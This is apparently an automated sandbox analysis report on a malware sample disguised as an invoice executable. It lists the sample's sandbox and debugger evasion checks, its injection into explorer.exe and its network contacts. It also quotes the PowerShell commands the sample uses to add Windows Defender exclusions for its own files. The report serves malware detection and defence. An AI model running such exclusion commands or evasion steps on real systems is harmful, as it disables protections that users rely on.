Source: explorer.exe, 0000000D.00000000.275306032.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 0000000D.00000000.275968465.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 0000000D.00000000.268751603.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: powershell.exe, 00000004.00000003.393456131.0000000004DC0000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.394881873.0000000004F3D000.00000004.00000001.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: explorer.exe, 0000000D.00000000.268751603.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Invoiceo.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Invoiceo.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmd.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\Invoiceo.exe

Code function: 11_2_00409A80 rdtsc

11_2_00409A80

Source: C:\Users\user\Desktop\Invoiceo.exe

Code function: 11_2_0040ACC0 LdrLoadDll,

11_2_0040ACC0

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 26_2_00352258 IsDebuggerPresent,

26_2_00352258

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0035B5E0 mov eax, dword ptr fs:[00000030h]	26_2_0035B5E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CE730 mov eax, dword ptr fs:[00000030h]	26_2_033CE730
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03394F2E mov eax, dword ptr fs:[00000030h]	26_2_03394F2E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03394F2E mov eax, dword ptr fs:[00000030h]	26_2_03394F2E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03468B58 mov eax, dword ptr fs:[00000030h]	26_2_03468B58
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03468F6A mov eax, dword ptr fs:[00000030h]	26_2_03468F6A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033C3B7A mov eax, dword ptr fs:[00000030h]	26_2_033C3B7A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033C3B7A mov eax, dword ptr fs:[00000030h]	26_2_033C3B7A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0346070D mov eax, dword ptr fs:[00000030h]	26_2_0346070D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0346070D mov eax, dword ptr fs:[00000030h]	26_2_0346070D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0342FF10 mov eax, dword ptr fs:[00000030h]	26_2_0342FF10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0342FF10 mov eax, dword ptr fs:[00000030h]	26_2_0342FF10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339DB60 mov ecx, dword ptr fs:[00000030h]	26_2_0339DB60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033AFF60 mov eax, dword ptr fs:[00000030h]	26_2_033AFF60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0345131B mov eax, dword ptr fs:[00000030h]	26_2_0345131B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339F358 mov eax, dword ptr fs:[00000030h]	26_2_0339F358
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339DB40 mov eax, dword ptr fs:[00000030h]	26_2_0339DB40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033AEF40 mov eax, dword ptr fs:[00000030h]	26_2_033AEF40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CB390 mov eax, dword ptr fs:[00000030h]	26_2_033CB390
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A1B8F mov eax, dword ptr fs:[00000030h]	26_2_033A1B8F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A1B8F mov eax, dword ptr fs:[00000030h]	26_2_033A1B8F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0344D380 mov ecx, dword ptr fs:[00000030h]	26_2_0344D380
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0345138A mov eax, dword ptr fs:[00000030h]	26_2_0345138A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03417794 mov eax, dword ptr fs:[00000030h]	26_2_03417794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03417794 mov eax, dword ptr fs:[00000030h]	26_2_03417794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03417794 mov eax, dword ptr fs:[00000030h]	26_2_03417794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03465BA5 mov eax, dword ptr fs:[00000030h]	26_2_03465BA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339E620 mov eax, dword ptr fs:[00000030h]	26_2_0339E620
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0344B260 mov eax, dword ptr fs:[00000030h]	26_2_0344B260
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0344B260 mov eax, dword ptr fs:[00000030h]	26_2_0344B260
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03468A62 mov eax, dword ptr fs:[00000030h]	26_2_03468A62
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033B3A1C mov eax, dword ptr fs:[00000030h]	26_2_033B3A1C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339C600 mov eax, dword ptr fs:[00000030h]	26_2_0339C600
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339C600 mov eax, dword ptr fs:[00000030h]	26_2_0339C600
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339C600 mov eax, dword ptr fs:[00000030h]	26_2_0339C600
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D927A mov eax, dword ptr fs:[00000030h]	26_2_033D927A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033BAE73 mov eax, dword ptr fs:[00000030h]	26_2_033BAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033BAE73 mov eax, dword ptr fs:[00000030h]	26_2_033BAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033BAE73 mov eax, dword ptr fs:[00000030h]	26_2_033BAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033BAE73 mov eax, dword ptr fs:[00000030h]	26_2_033BAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033BAE73 mov eax, dword ptr fs:[00000030h]	26_2_033BAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A766D mov eax, dword ptr fs:[00000030h]	26_2_033A766D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03399240 mov eax, dword ptr fs:[00000030h]	26_2_03399240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03399240 mov eax, dword ptr fs:[00000030h]	26_2_03399240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03399240 mov eax, dword ptr fs:[00000030h]	26_2_03399240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03399240 mov eax, dword ptr fs:[00000030h]	26_2_03399240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0344FE3F mov eax, dword ptr fs:[00000030h]	26_2_0344FE3F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A7E41 mov eax, dword ptr fs:[00000030h]	26_2_033A7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A7E41 mov eax, dword ptr fs:[00000030h]	26_2_033A7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A7E41 mov eax, dword ptr fs:[00000030h]	26_2_033A7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A7E41 mov eax, dword ptr fs:[00000030h]	26_2_033A7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A7E41 mov eax, dword ptr fs:[00000030h]	26_2_033A7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A7E41 mov eax, dword ptr fs:[00000030h]	26_2_033A7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0344FEC0 mov eax, dword ptr fs:[00000030h]	26_2_0344FEC0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033AAAB0 mov eax, dword ptr fs:[00000030h]	26_2_033AAAB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033AAAB0 mov eax, dword ptr fs:[00000030h]	26_2_033AAAB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CFAB0 mov eax, dword ptr fs:[00000030h]	26_2_033CFAB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03468ED6 mov eax, dword ptr fs:[00000030h]	26_2_03468ED6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033952A5 mov eax, dword ptr fs:[00000030h]	26_2_033952A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033952A5 mov eax, dword ptr fs:[00000030h]	26_2_033952A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033952A5 mov eax, dword ptr fs:[00000030h]	26_2_033952A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033952A5 mov eax, dword ptr fs:[00000030h]	26_2_033952A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033952A5 mov eax, dword ptr fs:[00000030h]	26_2_033952A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CD294 mov eax, dword ptr fs:[00000030h]	26_2_033CD294
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CD294 mov eax, dword ptr fs:[00000030h]	26_2_033CD294
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0342FE87 mov eax, dword ptr fs:[00000030h]	26_2_0342FE87
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A76E2 mov eax, dword ptr fs:[00000030h]	26_2_033A76E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033C16E0 mov ecx, dword ptr fs:[00000030h]	26_2_033C16E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03460EA5 mov eax, dword ptr fs:[00000030h]	26_2_03460EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03460EA5 mov eax, dword ptr fs:[00000030h]	26_2_03460EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03460EA5 mov eax, dword ptr fs:[00000030h]	26_2_03460EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_034146A7 mov eax, dword ptr fs:[00000030h]	26_2_034146A7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033C36CC mov eax, dword ptr fs:[00000030h]	26_2_033C36CC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D8EC7 mov eax, dword ptr fs:[00000030h]	26_2_033D8EC7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03413540 mov eax, dword ptr fs:[00000030h]	26_2_03413540
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033C513A mov eax, dword ptr fs:[00000030h]	26_2_033C513A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033C513A mov eax, dword ptr fs:[00000030h]	26_2_033C513A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033C4D3B mov eax, dword ptr fs:[00000030h]	26_2_033C4D3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033C4D3B mov eax, dword ptr fs:[00000030h]	26_2_033C4D3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033C4D3B mov eax, dword ptr fs:[00000030h]	26_2_033C4D3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339AD30 mov eax, dword ptr fs:[00000030h]	26_2_0339AD30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A3D34 mov eax, dword ptr fs:[00000030h]	26_2_033A3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A3D34 mov eax, dword ptr fs:[00000030h]	26_2_033A3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A3D34 mov eax, dword ptr fs:[00000030h]	26_2_033A3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A3D34 mov eax, dword ptr fs:[00000030h]	26_2_033A3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A3D34 mov eax, dword ptr fs:[00000030h]	26_2_033A3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A3D34 mov eax, dword ptr fs:[00000030h]	26_2_033A3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A3D34 mov eax, dword ptr fs:[00000030h]	26_2_033A3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A3D34 mov eax, dword ptr fs:[00000030h]	26_2_033A3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A3D34 mov eax, dword ptr fs:[00000030h]	26_2_033A3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A3D34 mov eax, dword ptr fs:[00000030h]	26_2_033A3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A3D34 mov eax, dword ptr fs:[00000030h]	26_2_033A3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A3D34 mov eax, dword ptr fs:[00000030h]	26_2_033A3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A3D34 mov eax, dword ptr fs:[00000030h]	26_2_033A3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033B4120 mov eax, dword ptr fs:[00000030h]	26_2_033B4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033B4120 mov eax, dword ptr fs:[00000030h]	26_2_033B4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033B4120 mov eax, dword ptr fs:[00000030h]	26_2_033B4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033B4120 mov eax, dword ptr fs:[00000030h]	26_2_033B4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033B4120 mov ecx, dword ptr fs:[00000030h]	26_2_033B4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03399100 mov eax, dword ptr fs:[00000030h]	26_2_03399100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03399100 mov eax, dword ptr fs:[00000030h]	26_2_03399100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03399100 mov eax, dword ptr fs:[00000030h]	26_2_03399100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339B171 mov eax, dword ptr fs:[00000030h]	26_2_0339B171
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339B171 mov eax, dword ptr fs:[00000030h]	26_2_0339B171
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033BC577 mov eax, dword ptr fs:[00000030h]	26_2_033BC577
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033BC577 mov eax, dword ptr fs:[00000030h]	26_2_033BC577
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033B7D50 mov eax, dword ptr fs:[00000030h]	26_2_033B7D50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03468D34 mov eax, dword ptr fs:[00000030h]	26_2_03468D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0341A537 mov eax, dword ptr fs:[00000030h]	26_2_0341A537
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D3D43 mov eax, dword ptr fs:[00000030h]	26_2_033D3D43
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033BB944 mov eax, dword ptr fs:[00000030h]	26_2_033BB944
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033BB944 mov eax, dword ptr fs:[00000030h]	26_2_033BB944
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033C35A1 mov eax, dword ptr fs:[00000030h]	26_2_033C35A1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CFD9B mov eax, dword ptr fs:[00000030h]	26_2_033CFD9B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CFD9B mov eax, dword ptr fs:[00000030h]	26_2_033CFD9B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03392D8A mov eax, dword ptr fs:[00000030h]	26_2_03392D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03392D8A mov eax, dword ptr fs:[00000030h]	26_2_03392D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03392D8A mov eax, dword ptr fs:[00000030h]	26_2_03392D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03392D8A mov eax, dword ptr fs:[00000030h]	26_2_03392D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03392D8A mov eax, dword ptr fs:[00000030h]	26_2_03392D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03448DF1 mov eax, dword ptr fs:[00000030h]	26_2_03448DF1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CA185 mov eax, dword ptr fs:[00000030h]	26_2_033CA185
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033BC182 mov eax, dword ptr fs:[00000030h]	26_2_033BC182
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339B1E1 mov eax, dword ptr fs:[00000030h]	26_2_0339B1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339B1E1 mov eax, dword ptr fs:[00000030h]	26_2_0339B1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339B1E1 mov eax, dword ptr fs:[00000030h]	26_2_0339B1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033AB02A mov eax, dword ptr fs:[00000030h]	26_2_033AB02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033AB02A mov eax, dword ptr fs:[00000030h]	26_2_033AB02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033AB02A mov eax, dword ptr fs:[00000030h]	26_2_033AB02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033AB02A mov eax, dword ptr fs:[00000030h]	26_2_033AB02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CBC2C mov eax, dword ptr fs:[00000030h]	26_2_033CBC2C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0342C450 mov eax, dword ptr fs:[00000030h]	26_2_0342C450
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0342C450 mov eax, dword ptr fs:[00000030h]	26_2_0342C450
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03461074 mov eax, dword ptr fs:[00000030h]	26_2_03461074
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03452073 mov eax, dword ptr fs:[00000030h]	26_2_03452073
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451C06 mov eax, dword ptr fs:[00000030h]	26_2_03451C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451C06 mov eax, dword ptr fs:[00000030h]	26_2_03451C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451C06 mov eax, dword ptr fs:[00000030h]	26_2_03451C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451C06 mov eax, dword ptr fs:[00000030h]	26_2_03451C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451C06 mov eax, dword ptr fs:[00000030h]	26_2_03451C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451C06 mov eax, dword ptr fs:[00000030h]	26_2_03451C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451C06 mov eax, dword ptr fs:[00000030h]	26_2_03451C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451C06 mov eax, dword ptr fs:[00000030h]	26_2_03451C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451C06 mov eax, dword ptr fs:[00000030h]	26_2_03451C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451C06 mov eax, dword ptr fs:[00000030h]	26_2_03451C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451C06 mov eax, dword ptr fs:[00000030h]	26_2_03451C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451C06 mov eax, dword ptr fs:[00000030h]	26_2_03451C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451C06 mov eax, dword ptr fs:[00000030h]	26_2_03451C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03451C06 mov eax, dword ptr fs:[00000030h]	26_2_03451C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0346740D mov eax, dword ptr fs:[00000030h]	26_2_0346740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0346740D mov eax, dword ptr fs:[00000030h]	26_2_0346740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0346740D mov eax, dword ptr fs:[00000030h]	26_2_0346740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03416C0A mov eax, dword ptr fs:[00000030h]	26_2_03416C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03416C0A mov eax, dword ptr fs:[00000030h]	26_2_03416C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03416C0A mov eax, dword ptr fs:[00000030h]	26_2_03416C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03416C0A mov eax, dword ptr fs:[00000030h]	26_2_03416C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03464015 mov eax, dword ptr fs:[00000030h]	26_2_03464015
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03464015 mov eax, dword ptr fs:[00000030h]	26_2_03464015
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033B746D mov eax, dword ptr fs:[00000030h]	26_2_033B746D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03417016 mov eax, dword ptr fs:[00000030h]	26_2_03417016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03417016 mov eax, dword ptr fs:[00000030h]	26_2_03417016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03417016 mov eax, dword ptr fs:[00000030h]	26_2_03417016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033B0050 mov eax, dword ptr fs:[00000030h]	26_2_033B0050
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033B0050 mov eax, dword ptr fs:[00000030h]	26_2_033B0050
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CF0BF mov ecx, dword ptr fs:[00000030h]	26_2_033CF0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CF0BF mov eax, dword ptr fs:[00000030h]	26_2_033CF0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CF0BF mov eax, dword ptr fs:[00000030h]	26_2_033CF0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03468CD6 mov eax, dword ptr fs:[00000030h]	26_2_03468CD6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D90AF mov eax, dword ptr fs:[00000030h]	26_2_033D90AF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0342B8D0 mov eax, dword ptr fs:[00000030h]	26_2_0342B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0342B8D0 mov ecx, dword ptr fs:[00000030h]	26_2_0342B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0342B8D0 mov eax, dword ptr fs:[00000030h]	26_2_0342B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0342B8D0 mov eax, dword ptr fs:[00000030h]	26_2_0342B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0342B8D0 mov eax, dword ptr fs:[00000030h]	26_2_0342B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0342B8D0 mov eax, dword ptr fs:[00000030h]	26_2_0342B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03416CF0 mov eax, dword ptr fs:[00000030h]	26_2_03416CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03416CF0 mov eax, dword ptr fs:[00000030h]	26_2_03416CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03416CF0 mov eax, dword ptr fs:[00000030h]	26_2_03416CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03399080 mov eax, dword ptr fs:[00000030h]	26_2_03399080
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_034514FB mov eax, dword ptr fs:[00000030h]	26_2_034514FB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03413884 mov eax, dword ptr fs:[00000030h]	26_2_03413884
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03413884 mov eax, dword ptr fs:[00000030h]	26_2_03413884

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 26_2_0033AC30 GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,

26_2_0033AC30

Source: C:\Users\user\Desktop\Invoiceo.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\Invoiceo.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmd.exe	Process token adjusted: Debug

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00347310 SetUnhandledExceptionFilter,		26_2_00347310
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00346FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		26_2_00346FE3

Source: C:\Users\user\Desktop\Invoiceo.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.swim-maki.com
Source: C:\Windows\explorer.exe	Network Connect: 154.207.58.218 80
Source: C:\Windows\explorer.exe	Domain query: www.tabuk24.com

Adds a directory exclusion to Windows Defender

Show sources

Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Invoiceo.exe'
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yYxmxiApi.exe'
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yYxmxiApi.exe'
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Invoiceo.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yYxmxiApi.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yYxmxiApi.exe'	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Invoiceo.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
